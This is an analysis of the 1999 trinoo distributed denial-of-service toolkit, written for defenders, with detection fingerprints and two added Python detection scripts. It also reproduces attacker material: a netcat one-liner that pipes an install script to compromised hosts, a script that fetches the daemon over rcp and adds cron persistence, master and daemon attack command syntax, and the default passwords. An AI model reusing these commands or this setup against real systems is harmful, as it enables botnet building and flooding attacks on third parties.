Trinoo: analysis of a DDoS attack tool

This article is an analysis of the master and slave (daemon) components of the trinoo distributed denial of service attack toolkit.

The trinoo daemon binaries were first found on a number of Solaris 2.x hosts that had been compromised through vulnerabilities in the RPC services "statd", "cmsd" and "ttdbserverd". For details of these vulnerabilities see the CERT incident note IN-99-04:

http://www.cert.org/incident_notes/IN-99-04.html
The first trinoo daemons came with a UDP-based remote command shell with access control, and were probably accompanied by a sniffer that logged automatically.
While the toolkit was being examined, the installation of a trinoo network was captured in progress, together with some of the source code. The analysis below is based on that captured source.


Any modification of this source code (prompts, passwords, commands, TCP/UDP port numbers, supported attack methods, signatures or specific functions) will produce results that differ from those described in this article.


The daemon was compiled and run on Solaris 2.5.1 and Red Hat Linux 6.0; the master server was compiled and run on Red Hat Linux 6.0. Both the master and the daemon can probably be used on other similar platforms.


A trinoo network may consist of hundreds or even thousands of compromised Internet hosts. These hosts have most likely also been fitted with various "back doors" that let the attacker re-enter the system.


On August 17, 1999 a trinoo network of at least 227 hosts (114 of them on Internet2) attacked a single university host in Minnesota, and the attack brought down that host's network for more than two days. During the investigation of this attack at least 16 other hosts were found to have been attacked, some of them outside the United States. (See Appendix D for a report on the trinoo attack.)


Course of an attack


A typical attack would probably unfold as follows:


1) A stolen account is used to compile the various scanning tools, attack tools (such as buffer overflow programs), rootkits and sniffers, the trinoo daemon and master server, and the lists of compromised hosts and target hosts. This is usually a large system with many users, lax administration and a high-speed connection (for file transfer).


2) A wide-ranging network scan is then run to find potential targets for intrusion. The most likely targets are hosts with one of several remote buffer overflow vulnerabilities, such as wu-ftpd or the RPC services (cmsd, statd, ttdbserverd, amd). The preferred operating systems are Sun Solaris 2.x and Linux, so that the ready-made rootkits and backdoors can be put to full use. Hosts running other systems can be used to store tools and records.


3) A list of compromised hosts is built from the results of the intrusion script, which attacks each host and then checks for a listening TCP port (usually 1524, "ingreslock"), connecting to it to confirm that the intrusion succeeded. Alternatively the script confirms the compromise by sending e-mail to a free web-mail account.


Once the intrusions are complete, the list of "owned" hosts is used to place backdoors, sniffers, trinoo daemons or trinoo master servers.


4) From the list of compromised systems, hosts that meet the requirements of the trinoo network are selected, and pre-compiled trinoo daemons are placed on them.


5) Finally the DoS attack script is run. From the list of compromised hosts built above it generates a further script that installs the daemons in the background as fast as possible. That script uses "netcat" to send a shell script to port 1524/tcp of each compromised host:


./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &
./trin.sh | nc 128.aaa.167.219 1524 &
./trin.sh | nc 128.aaa.187.38 1524 &
./trin.sh | nc 128.bbb.2.80 1524 &
./trin.sh | nc 128.bbb.2.81 1524 &
./trin.sh | nc 128.bbb.2.238 1524 &
./trin.sh | nc 128.ccc.12.22 1524 &
./trin.sh | nc 128.ccc.12.50 1524 &
...


where the "trin.sh" script has the following contents:


echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"


Checking crontab files from time to time is therefore an easy way to find out whether a host has been compromised by trinoo.


Another method was found on other systems: the daemon was renamed "xterm" and started from a script:


cd /var/adm/.1
PATH=.:$PATH
export PATH
xterm 1>/dev/null 2>&1


It is entirely possible to build a complete trinoo network just by running the daemon from scripts like this.


A more subtle method is to have the trinoo daemon or master server wake up at a given time, run, and open its TCP or UDP port for listening.


The whole installation process is automated, which lets an attacker turn a large number of compromised hosts into a denial of service network in a very short time.


6) Optionally, a rootkit is installed on the system to hide the attacker's processes, files and network connections. This matters most on the master server, since it is the core of the trinoo network. (Note: in many cases the master was installed on a domain name server of an Internet service provider (ISP). A DNS server carries a large volume of traffic and many TCP/UDP connections, which helps to hide the trinoo network connections, the attack process and the files. In addition, unless the presence of the denial of service tool on the name server can be shown, a system administrator is unlikely to interrupt the service for a security inspection.)


A rootkit may also install a sniffer on the system, such as "hunt" (a TCP/IP session monitor), which can directly eavesdrop on the details of network communications. This removes any need to re-enter the system through a remote buffer overflow. :)


For more information on rootkits, see:


http://staff.washington.edu/dittrich/faq/rootkits.faq


Network structure


A trinoo network consists of master servers (master.c) and trinoo daemons (ns.c). A typical trinoo network is structured as follows:


The attacker controls one or more "master" servers, and each master controls a number of "daemons" (also called broadcast hosts, "Bcast"). On command, all the daemons send attack packets at one or more target hosts at the same time.


How does trinoo do this? The attacker connects to the master over a TCP connection using the "telnet" protocol, supplies a password and sends commands; the master then drives a large-scale, high-volume, concurrent denial of service attack.
Communication ports


attacker to master:  27665/tcp
master to daemon:    27444/udp
daemon to master:    31335/udp


Remote control of the trinoo master is done over a TCP connection to port 27665/tcp. After the connection is established, the user must supply the correct password ("betaalmostdone"). If a second connection is made while an authenticated session is in progress, a warning message containing the connecting IP address is sent to the connected host (the IP address given seems to be wrong, but the warning is still sent). No doubt this feature is meant to give the attacker enough time to clear traces before leaving.


Communication from the master to the trinoo daemons is done over port 27444/udp. The command line format is:


arg1 password arg2


The default password is "l44adsl"; only command lines that contain the password substring "l44" are executed.


Communication from the trinoo daemons to the master is done over port 31335/udp.


When a daemon starts, it sends the initialization string "*HELLO*" to the master. The master (here captured with the "sniffit" program) records this and maintains a list of active daemons:


UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32876-10.0.0.1.31335
45 E 00. 00. 23 # B1. 5D] 40 @ 00. F8. 11. B9. 27. C0. A8. 00. 01.
0A. 00. 00. 01. 80. 6C l 7A z 67 g 00. 0F. 06. D4. 2A * 48 H 45 E 4C L
4C L 4F O 2A *


If the master sends a daemon the "png" command on port 27444/udp, the daemon replies with the string "PONG" to port 31335/udp of the host that sent the command:


UDP Packet ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444
45 E 00. 00. 27 '1A. AE. 00. 00. 40 @ 11. 47 G D4. 0A. 00. 00. 01.
C0. A8. 00. 01. 04. 00. 6B k 34 4 00. 13. 2F / B7. 70 p 6E n 67 g 20
6C l 34 4 34 4 61 a 64 d 73 s 6C l
UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32879-10.0.0.1.31335
45 E 00. 00. 20 13. 81. 40 @ 00. F8. 11. 57 W 07. C0. A8. 00. 01.
0A. 00. 00. 01. 80. 6F o 7A z 67 g 00. 0C. 4E N 24 $ 50 P 4F O 4E N 47 G


Password protection


Both the master and the daemon are password protected, to prevent system administrators (or rival hacker groups) from taking control of the trinoo network. The passwords are encrypted with the crypt() function, a symmetric encryption method. The encrypted passwords are compiled into the master and daemon binaries, and the password sent over the network in plain text is compared against them (the current version does not encrypt the communication session, so it is not hard to intercept the plain-text password in the TCP control session sent to the master).


When the master is started it prints a prompt and waits for the password. If the password is wrong, the program exits; if it is correct, a prompt is printed, a child process is forked to run in the background, and the parent exits:


# ./master
?? wrongpassword
#
...
# ./master
?? gOrave
trinoo v1.07d2+f3+c [Sep 26 1999:10:09:24]
#


Likewise, when connecting to the remote command port (27665/tcp) a password must be entered:


attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is '^]'.
kwijibo
Connection closed by foreign host.
...
attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is '^]'.
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]


Some of the commands sent from the master to the daemons are also password protected. These passwords are again sent in plain text between the master and the daemon.


The default passwords are:


"l44adsl"         trinoo daemon password
"gOrave"          trinoo master server startup password (prompt "??")
"betaalmostdone"  trinoo master server remote interface password
"killme"          trinoo master server password for the "mdie" command


Master server command


The trinoo master server supports the following commands:


die            Shut down the master server.
quit           Log off from the master server.
mtimer N       Set the DoS timer to N seconds. N can be between 1 and 1999 seconds; if N is less than 1 or greater than 2000, the default value of 500 is used.
mdie           If the password check passes, disable all broadcast (Bcast) hosts: the command "d1e l44adsl" is sent to each broadcast host to make it stop. This command requires a separate password.
mping          Send the PING command "png l44adsl" to every active broadcast host.
mdos           Send a multiple-target DoS command ("xyz l44adsl 123:ip1:ip2:ip3") to each broadcast host.
msize          Set the buffer size of the packets used in DoS attacks.
nslookup host  Do a name service lookup on the specified host name.
killdead       Try to weed out dead broadcast hosts. First the "shi l44adsl" command is sent to all known broadcast hosts (any daemon that is still active replies with the initialization string "*HELLO*"). The broadcast host list file is then renamed (via the -b parameter) so that a new list is built only from the daemons whose "*HELLO*" packets are received.
usebackup      Switch to the backup broadcast host file created by "killdead".
bcast          List all active broadcast hosts.
help [cmd]     Give help on the server commands.
mstop          Try to stop a DoS attack (not yet implemented, but listed in the help command).

There is also a command that prints version and compile information, such as:

This is the "trinoo" AKA DoS Project master server version v1.07d2+f3+c
Compiled 15:08:41 Aug 16 1999


Daemon commands


The trinoo daemon supports the following commands:


aaa pass IP               Attack the specified IP address: send UDP packets to random UDP ports (0-65534) on the target for a period of time (default 120 seconds, or 1-1999 seconds as set by the "bbb" command). The packet size is set by the "rsz" command and defaults to 1000 bytes.
rsz N                     Set the DoS attack buffer size to N bytes. (The trinoo daemon allocates a buffer of that size with malloc() and sends its random contents as the attack payload.)
xyz pass 123:ip1:ip2:ip3  Multiple-target DoS. Like the "aaa" command, but attacks several IP addresses at the same time.


Tool characteristics


The most common way of installing a trinoo daemon is to add an entry to the system crontab so that the daemon is run every minute. Check crontab files for an entry like the following:


* * * * * /usr/sbin/rpc.listen


The master program creates a file containing the list of broadcast hosts (the default file name is "..."). When "killdead" is used, the "shi" command is sent to all daemons listed in "...", which makes every live daemon send the initialization string "*HELLO*" to all of its masters. The list file is then renamed (by default to "...-b") and a new list file is generated from the daemons that sent a "*HELLO*" string (i.e. those still active).


The source code ("master.c") contains the following lines:


...
/* crypt key encrypted with the key 'bored' (so hex edit cannot get key easily?)
   Comment out for no encryption... */

#define CRYPTKEY "ZsoTN.cq4X31"
...


If CRYPTKEY is defined when the program is compiled, the IP addresses of the broadcast hosts are encrypted with the Blowfish algorithm:


# ls -l ... ...-b
-rw-------   1 root     root           25 Sep 26 14:46 ...
-rw-------   1 root     root           50 Sep 26 14:30 ...-b
# cat ...
JPbUc05Swk/0gMvui18BrFH/
# cat ...-b
aE5sK0PIFws0Y0EhH02fLVK.
JPbUc05Swk/0gMvui18BrFH/


Assuming no rootkit is used to hide processes, the master shows the following network socket fingerprint (the program name and path will of course vary):



# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:27665                 *:*                     LISTEN
...
udp        0      0 *:31335                 *:*
...
# lsof | egrep ":31335|:27665"
master    1292     root    3u  inet   2460       UDP *:31335
master    1292     root    4u  inet   2461       TCP *:27665 (LISTEN)
# lsof -p 1292
COMMAND  PID USER   FD   TYPE DEVICE    SIZE   NODE NAME
master  1292 root  cwd    DIR    3,1    1024  14356 /tmp/...
master  1292 root  rtd    DIR    3,1    1024      2 /
master  1292 root  txt    REG    3,1   30492  14357 /tmp/.../master
master  1292 root  mem    REG    3,1  342206  28976 /lib/ld-2.1.1.so
master  1292 root  mem    REG    3,1   63878  29116 /lib/libcrypt-2.1.1.so
master  1292 root  mem    REG    3,1 4016683  29115 /lib/libc-2.1.1.so
master  1292 root    0u   CHR    4,1            2967 /dev/tty1
master  1292 root    1u   CHR    4,1            2967 /dev/tty1
master  1292 root    2u   CHR    4,1            2967 /dev/tty1
master  1292 root    3u  inet   2534             UDP *:31335
master  1292 root    4u  inet   2535             TCP *:27665 (LISTEN)


A system running the daemon shows the following fingerprint:


# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
...
udp        0      0 *:1024                  *:*
udp        0      0 *:27444                 *:*
...
# lsof | egrep ":27444"
ns        1316     root    3u  inet   2502       UDP *:27444
# lsof -p 1316
COMMAND  PID USER   FD   TYPE DEVICE    SIZE   NODE NAME
ns      1316 root  cwd    DIR    3,1    1024 153694 /tmp/...
ns      1316 root  rtd    DIR    3,1    1024      2 /
ns      1316 root  txt    REG    3,1    6156 153711 /tmp/.../ns
ns      1316 root  mem    REG    3,1  342206  28976 /lib/ld-2.1.1.so
ns      1316 root  mem    REG    3,1   63878  29116 /lib/libcrypt-2.1.1.so
ns      1316 root  mem    REG    3,1 4016683  29115 /lib/libc-2.1.1.so
ns      1316 root    0u   CHR    4,1            2967 /dev/tty1
ns      1316 root    1u   CHR    4,1            2967 /dev/tty1
ns      1316 root    2u   CHR    4,1            2967 /dev/tty1
ns      1316 root    3u  inet   2502             UDP *:27444
ns      1316 root    4u  inet   2503             UDP *:1024


Defense


The best defence is of course to prevent the initial root-level compromise, so that a trinoo master or daemon is never installed on your systems. In an ideal world all systems would be fully patched, secure and monitored, intrusion detection systems and firewalls would detect and reject the attack packets, and I would be a millionaire living six months of the year on Barry Island and six months in the French Alps. :) In the real world this is not achievable (at least not in the foreseeable future).


If a number of trinoo daemons may have been installed and are running on your network, ready to launch DoS attacks on other systems, how do you find and stop them?


Because these programs use high-numbered UDP ports both for their communication and for the attack itself, blocking the traffic directly is very hard (though not impossible) without also interfering with legitimate programs that use high-numbered UDP ports.


The simplest check for the presence of a trinoo master or daemon is probably to watch all UDP packets on a shared Ethernet segment for the master-daemon communication strings described in this article. Unfortunately, this activity is likely to be noticed only during or after a DoS attack on a target host.


If a trinoo daemon is suspected of running an attack on a Solaris system, running the "truss" program on the daemon produces output like the following:


...
getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) = 0
getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) (sleeping...)
getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) = 0
time() = 938385467
open("/dev/udp", O_RDWR) = 5
ioctl(5, I_PUSH, "sockmod") = 0
ioctl(5, I_STR, 0xEFFFF748) = 0
ioctl(5, I_SETCLTIME, 0xEFFFF7FC) = 0
ioctl(5, I_SWROPT, 0x00000002) = 0
sigprocmask(SIG_SETMASK, 0xEFFFF7EC, 0xEFFFF7DC) = 0
ioctl(5, I_STR, 0xEFFFF660) = 0
sigprocmask(SIG_SETMASK, 0xEFFFF7DC, 0xEFFFF7B8) = 0
sigprocmask(SIG_BLOCK, 0xEFFFF548, 0xEFFFF5C0) = 0
ioctl(5, I_STR, 0xEFFFF548) = 0
sigprocmask(SIG_SETMASK, 0xEFFFF5C0, 0x00000000) = 0
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
time() = 938385467
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
time() = 938385467
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
time() = 938385467
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
time() = 938385467
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
time() = 938385467
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
time() = 938385467
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
time() = 938385467
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
time() = 938385467
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
time() = 938385467
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
time() = 938385467
...


During an attack on a single target, monitoring the network traffic with "tcpdump" shows the following:


# tcpdump ip host 192.168.0.1
...
... 192.168.0.1.27444: udp 25
... 216.160.XX.YY.16838: udp 4 (DF)
... 216.160.XX.YY.5758: udp 4 (DF)
... 216.160.XX.YY.10113: udp 4 (DF)
... 216.160.XX.YY.17515: udp 4 (DF)
... 216.160.XX.YY.31051: udp 4 (DF)
... 216.160.XX.YY.5627: udp 4 (DF)
... 216.160.XX.YY.23010: udp 4 (DF)
... 216.160.XX.YY.7419: udp 4 (DF)
... 216.160.XX.YY.16212: udp 4 (DF)
... 216.160.XX.YY.4086: udp 4 (DF)
... 216.160.XX.YY.2749: udp 4 (DF)
... 216.160.XX.YY.12767: udp 4 (DF)
... 216.160.XX.YY.9084: udp 4 (DF)
... 216.160.XX.YY.12060: udp 4 (DF)
... 216.160.XX.YY.32225: udp 4 (DF)
...
Deficiencies and weaknesses


The first weakness is the use of crypt() to encrypt the passwords, combined with the fact that the communication between master and daemon, and the prompt strings they return, can be intercepted.


This lets you identify the presence of a master or daemon, determine whether the default passwords given in this article are in use, and possibly, by cracking the passwords, gain some (or complete) control of the trinoo network.


However, if the attacker has cleverly modified the source code, you may have to crack the passwords, or edit the binary with a hex/ASCII editor to change the command sequences, in order to obtain the host lists from the master or daemon.


If you are fortunate enough that the source code was not modified, you can search the installed files for the default strings to find the passwords:


# strings - ns
...
socket
bind
recvfrom
%s %s %s
aIf3YWfOhw.V.      <=== crypt() encrypted password "l44adsl"
PONG
*HELLO*
...
# strings - master
...
---v
v1.07d2+f3+c
trinoo %s
l44adsl            <=== clear text version of daemon password
sock
0nm1VNMXqRMyM      <=== crypt() encrypted password "gOrave"
10:09:24
Sep 26 1999
trinoo %s [%s:%s]
bind
read
*HELLO*
ZsoTN.cq4X31       <=== CRYPTKEY
bored
NEW Bcast - %s
PONG
PONG %d Received from %s
Warning: Connection from %s
beUBZbLtK7kkY      <=== crypt() encrypted password "betaalmostdone"
trinoo %s..[rpm8d/cb4Sx/]
...
DoS: usage: dos
DoS: Packeting %s.
aaa %s %s
mdie
ErDVt6azHrePE      <=== crypt() encrypted password for "mdie" command
mdie: Disabling Bcasts.
d1e %s
mdie: password?
...
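As an added example (not part of the original analysis and not trinoo's code), the following Python implements the strings-style check just described over a byte blob: it extracts printable runs, matches them against the signature strings listed above, and flags 13-character crypt()-shaped tokens as candidate compiled-in passwords. The sample blobs are constructed from the string tables shown above, not real binaries, and the function names are my own.

```python
# Added example for this article (not trinoo's code and not the original
# author's); the names and the sample blobs below are my own constructions.
import re

# Signature strings the analysis found with strings(1) in unmodified trinoo
# binaries (daemon "ns" and "master"), with what each one indicates.
TRINOO_STRINGS = {
    "*HELLO*": "daemon registration string",
    "PONG": "daemon reply to the png command",
    "l44adsl": "clear-text default daemon password",
    "NEW Bcast - %s": "master: new daemon registered",
    "PONG %d Received from %s": "master: PONG bookkeeping",
    "DoS: Packeting %s.": "master: dos command banner",
    "mdie: Disabling Bcasts.": "master: mdie command banner",
    "ZsoTN.cq4X31": "master: CRYPTKEY for the Blowfish-encrypted host list",
}

# Traditional crypt() output is 13 characters from [./0-9A-Za-z] (2-char salt
# plus 11). Any such token is reported as a candidate; expect false positives.
CRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")


def printable_strings(blob, minlen=4):
    """Minimal strings(1): yield (offset, text) for each run of printable ASCII
    that is at least minlen bytes long."""
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % minlen, blob):
        yield m.start(), m.group().decode("ascii")


def trinoo_indicators(blob, minlen=4):
    """Return indicator records found in a binary: known trinoo strings and
    crypt()-shaped tokens that may be compiled-in passwords."""
    found = []
    for off, s in printable_strings(blob, minlen):
        if s in TRINOO_STRINGS:
            found.append({"offset": off, "string": s, "kind": "signature",
                          "note": TRINOO_STRINGS[s]})
        elif CRYPT_RE.match(s):
            found.append({"offset": off, "string": s, "kind": "crypt-candidate",
                          "note": "13-character crypt()-style hash"})
    return found


def verdict(blob):
    """Classify a binary as 'master', 'daemon' or 'clean' from its signatures."""
    sigs = {i["string"] for i in trinoo_indicators(blob) if i["kind"] == "signature"}
    if "NEW Bcast - %s" in sigs or "ZsoTN.cq4X31" in sigs:
        return "master"
    if "*HELLO*" in sigs and "PONG" in sigs:
        return "daemon"
    return "clean"


def _blob(strings):
    """Build a constructed fake binary: an ELF-like prefix, NUL-separated strings, junk."""
    return b"\x7fELF\x01\x01\x01\x00" + b"\x00".join(strings) + b"\x00\xff\xfe\x00"


# Constructed sample blobs mirroring the strings output quoted in the article.
SAMPLE_NS = _blob([b"socket", b"bind", b"recvfrom", b"%s %s %s",
                   b"aIf3YWfOhw.V.", b"PONG", b"*HELLO*"])
SAMPLE_MASTER = _blob([b"---v", b"v1.07d2+f3+c", b"trinoo %s", b"l44adsl", b"sock",
                       b"0nm1VNMXqRMyM", b"Sep 26 1999", b"*HELLO*", b"ZsoTN.cq4X31",
                       b"bored", b"NEW Bcast - %s", b"PONG", b"beUBZbLtK7kkY",
                       b"aaa %s %s", b"mdie", b"ErDVt6azHrePE"])
SAMPLE_CLEAN = _blob([b"socket", b"bind", b"Hello, world", b"PONG"])
```

On a real system you would read the suspect file's bytes (for example the "rpc.listen" or "xterm" binary found through the crontab or lsof checks above) and pass them to verdict(); a "PONG" string alone is not treated as a hit.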


The second weakness is that the daemon password is sent in clear text across the network. If you know the UDP port numbers used by the master and the client (daemon), you can use "sniffit", "ngrep", "tcpdump" or another network monitoring program to intercept the UDP packets that carry the password (Appendix A gives an example using "ngrep").


For example, the following is the contents of a packet carrying the "png" command, intercepted with "sniffit":


UDP Packet ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444
45 E 00. 00. 27 '1A. AE. 00. 00. 40 @ 11. 47 G D4. 0A. 00. 00. 01.
C0. A8. 00. 01. 04. 00. 6B k 34 4 00. 13. 2F / B7. 70 p 6E n 67 g 20
6C l 34 4 34 4 61 a 64 d 73 s 6C l


As mentioned above, the "mdie" command of the trinoo master is password protected. There are several ways to get around this.


If you can find the encrypted password with the UNIX "strings" command, you may be able to crack it with a password cracking tool (see Appendix C). This can take a very long time if the password is strong, but it is feasible. (On a Pentium II machine it took us less than 30 seconds to crack the "mdie" command password, "killme".)


You could also try to sniff the password from the network between the attacker and the master, but if the command that needs the password is rarely (or never) executed, this will be extremely difficult.


You may have more luck intercepting the daemon password, since most commands need it. This can be done on the daemon side or on the master side of the network (the two may be on entirely different networks). Intercepting on the daemon side is preferable, because there are many more daemons than masters, and because many masters were found running on busy domain name servers, where the high-port UDP traffic is far larger than on a daemon host and sniffing becomes much harder. Besides, once you find a site with several daemons running, it usually means you can be certain those systems have been compromised. :)


Once you have found a daemon, you can obtain the list of master IP addresses (using the "strings" command). You should immediately give the administrators of those sites the details so that they can examine their hosts for intrusion. (If the attacker used a rootkit, you may need to consult a professional security company or specialists.)


If a master is found, all the daemon IP addresses can be read from its list file (if it is not encrypted). If the file is encrypted, you either have to find the compile-time key used to encrypt it (the encryption algorithm is Blowfish) and decrypt the file, or take control of the master and use the "bcast" command to get the list of active daemons.


If you find an active session with the master (a "telnet" TCP session), you can take over the session with the "hunt" program and run commands. Without the "mdie" password you cannot stop all the daemons directly, but you can use the "bcast" command to get a list of all the daemons. (Since the list can be very large, scripting the command is recommended.)


Once you know all the daemon IP addresses and the daemon password, you can send UDP packets containing the correct command strings to any suspected trinoo daemon. Tools such as LibNet, Spak and the Perl Net::RawIP library can be used to construct and send the UDP packets. (The Perl script "trinot", which uses Net::RawIP, was written for this purpose; see Appendix B.)


Because a typical daemon installation adds a crontab entry that re-runs it every minute, you should remove those entries completely to prevent the daemon from being restarted.


Sniffing your network for UDP packets containing the strings "*HELLO*", "PONG" or the other signature strings can also show that daemons have been installed on the network. Note that this applies only to unmodified versions of the source code. The following is an example of a successful capture with "ngrep":


# ngrep -i -x "*hello*|pong" udp
interface: eth0 (192.168.0.200/255.255.255.0)
filter: ip and (udp)
match: *hello*|pong
...
# 10.0.0.1:31335
  2a 48 45 4c 4c 4f 2a                                  *HELLO*
### 10.0.0.1:31335
  50 4f 4e 47                                           PONG
10.0.0.1:31335
  50 4f 4e 47                                           PONG
10.0.0.1:31335
  50 4f 4e 47                                           PONG
...
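As an added example (not part of the original analysis and not trinoo's code), the following Python script recovers the raw bytes from the sniffit dumps quoted earlier in this article, decodes the IPv4 and UDP headers, and labels each packet by the trinoo exchange it matches (the "*HELLO*" registration, a master command such as "png", and the "PONG" reply), applying the same port and string signatures that the ngrep command above searches for. The function and field names are my own; the sample dumps are the three captures shown in the article.

```python
# Added example for this article (not trinoo's code and not the original
# author's); the function and field names below are my own choices.
import re
import struct

# Ports of the trinoo network as documented in the analysis.
MASTER_TO_DAEMON_UDP = 27444   # master -> daemon commands
DAEMON_TO_MASTER_UDP = 31335   # daemon -> master (*HELLO*, PONG)

# Daemon command verbs named in the analysis. The daemon acts on a line only
# when its password field contains the substring "l44".
DAEMON_VERBS = {"aaa", "bbb", "shi", "png", "d1e", "rsz", "xyz"}

# sniffit prints each byte as two upper-case hex digits followed by its ASCII
# glyph (or '.'), so only the 2-digit tokens on a dump line are bytes.
HEX_BYTE = re.compile(r"\b([0-9A-F]{2})\b")


def sniffit_bytes(dump):
    """Recover raw packet bytes from a sniffit hex/ASCII dump (header line skipped)."""
    raw = bytearray()
    for line in dump.strip().splitlines():
        if line.startswith("UDP Packet ID"):
            continue
        raw.extend(int(tok, 16) for tok in HEX_BYTE.findall(line))
    return bytes(raw)


def parse_ipv4_udp(raw):
    """Decode an IPv4+UDP datagram into a dict, or return None if it is not one."""
    if len(raw) < 20 or raw[0] >> 4 != 4:
        return None
    ihl = (raw[0] & 0x0F) * 4
    total_len = struct.unpack("!H", raw[2:4])[0]
    if raw[9] != 17 or len(raw) < ihl + 8 or total_len > len(raw):   # 17 = UDP
        return None
    src = ".".join(str(b) for b in raw[12:16])
    dst = ".".join(str(b) for b in raw[16:20])
    sport, dport, ulen = struct.unpack("!HHH", raw[ihl:ihl + 6])
    return {"src": src, "dst": dst, "sport": sport, "dport": dport,
            "payload": raw[ihl + 8:ihl + ulen]}


def parse_daemon_command(text):
    """Parse a master->daemon line 'verb password [arg]'. Returns None unless the
    verb is known and the password would pass the daemon's 'l44' substring check."""
    parts = text.split()
    if len(parts) < 2 or parts[0] not in DAEMON_VERBS or "l44" not in parts[1]:
        return None
    arg = parts[2] if len(parts) > 2 else None
    targets = []
    if parts[0] == "aaa" and arg:
        targets = [arg]                    # single victim
    elif parts[0] == "xyz" and arg:
        targets = arg.split(":")[1:]       # "123:ip1:ip2:ip3" -> the victims
    return {"verb": parts[0], "arg": arg, "targets": targets}


def classify(pkt):
    """Label a decoded UDP packet by the trinoo exchange it matches, or None."""
    text = pkt["payload"].decode("ascii", "replace")
    if pkt["dport"] == DAEMON_TO_MASTER_UDP:
        if text == "*HELLO*":
            return {"kind": "daemon-register", "daemon": pkt["src"], "master": pkt["dst"]}
        if text == "PONG":
            return {"kind": "daemon-pong", "daemon": pkt["src"], "master": pkt["dst"]}
    if pkt["dport"] == MASTER_TO_DAEMON_UDP:
        cmd = parse_daemon_command(text)
        if cmd:
            return {"kind": "master-command", "master": pkt["src"], "daemon": pkt["dst"], **cmd}
    return None


def scan_dumps(dumps):
    """Run the whole pipeline over a list of sniffit dumps; returns only the hits."""
    hits = []
    for dump in dumps:
        pkt = parse_ipv4_udp(sniffit_bytes(dump))
        label = classify(pkt) if pkt else None
        if label:
            hits.append(label)
    return hits


# Constructed sample input: the three sniffit captures quoted in the article
# (*HELLO* registration, the png command, and the PONG reply).
SAMPLE_DUMPS = [
"""UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32876-10.0.0.1.31335
45 E 00. 00. 23 # B1. 5D ] 40 @ 00. F8. 11. B9. 27 ' C0. A8. 00. 01.
0A. 00. 00. 01. 80. 6C l 7A z 67 g 00. 0F. 06. D4. 2A * 48 H 45 E 4C L
4C L 4F O 2A *""",
"""UDP Packet ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444
45 E 00. 00. 27 ' 1A. AE. 00. 00. 40 @ 11. 47 G D4. 0A. 00. 00. 01.
C0. A8. 00. 01. 04. 00. 6B k 34 4 00. 13. 2F / B7. 70 p 6E n 67 g 20
6C l 34 4 34 4 61 a 64 d 73 s 6C l""",
"""UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32879-10.0.0.1.31335
45 E 00. 00. 20 13. 81. 40 @ 00. F8. 11. 57 W 07. C0. A8. 00. 01.
0A. 00. 00. 01. 80. 6F o 7A z 67 g 00. 0C. 4E N 24 $ 50 P 4F O 4E N 47 G""",
]
```

Running scan_dumps(SAMPLE_DUMPS) yields one record per capture: the daemon 192.168.0.1 registering with the master 10.0.0.1, the master's "png" command, and the daemon's PONG; the "targets" field of an "aaa" or "xyz" hit gives the victim addresses to warn.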


Even if trinoo itself had no weaknesses, weaknesses can still be found in the way a trinoo network is built.


As mentioned above, some systems use a crontab entry to run the daemon, which is a very clear marker.


The automatic installation script for a trinoo network uses the Berkeley "rcp" command. Monitoring the network for "rcp" connections (514/tcp) to external IP addresses can identify it quickly. (Note: the "rcp" used by the script needs a trust relationship between the hosts, often set up with a "+ +" entry in the user's ~/.rhosts file. Checking that file can immediately reveal a possible intrusion.)


(For further trinoo analysis see Appendix E, "More trinoo detection methods", by George Weaver of Pennsylvania State University and David Brumley of Stanford University.)
Appendix A: "ngrep" network session capture


The following is an example of an attack session captured with "ngrep":


# ngrep -x ".*" tcp port 27665 or udp port 31335 or udp port 27444
interface: eth0 (192.168.0.200/255.255.255.0)
filter: ip and (tcp port 27665 or udp port 31335 or udp port 27444)
match: .*
# 10.0.0.1:31335
  2a 48 45 4c 4c 4f 2a                                  *HELLO*
# 10.0.0.1:27665 [AP]
  ff f4 ff fd 06                                        .....
###### 10.0.0.1:27665 [AP]
  62 65 74 61 61 6c 6d 6f 73 74 64 6f 6e 65 0d 0a       betaalmostdone..
# 192.168.100.1:1074 [AP]
  74 72 69 6e 6f 6f 20 76 31 2e 30 37 64 32 2b 66       trinoo v1.07d2+f
  33 2b 63 2e 2e 5b 72 70 6d 38 64 2f 63 62 34 53       3+c..[rpm8d/cb4S
  78 2f 5d 0a 0a 0a                                     x/]...
## 192.168.100.1:1074 [AP]
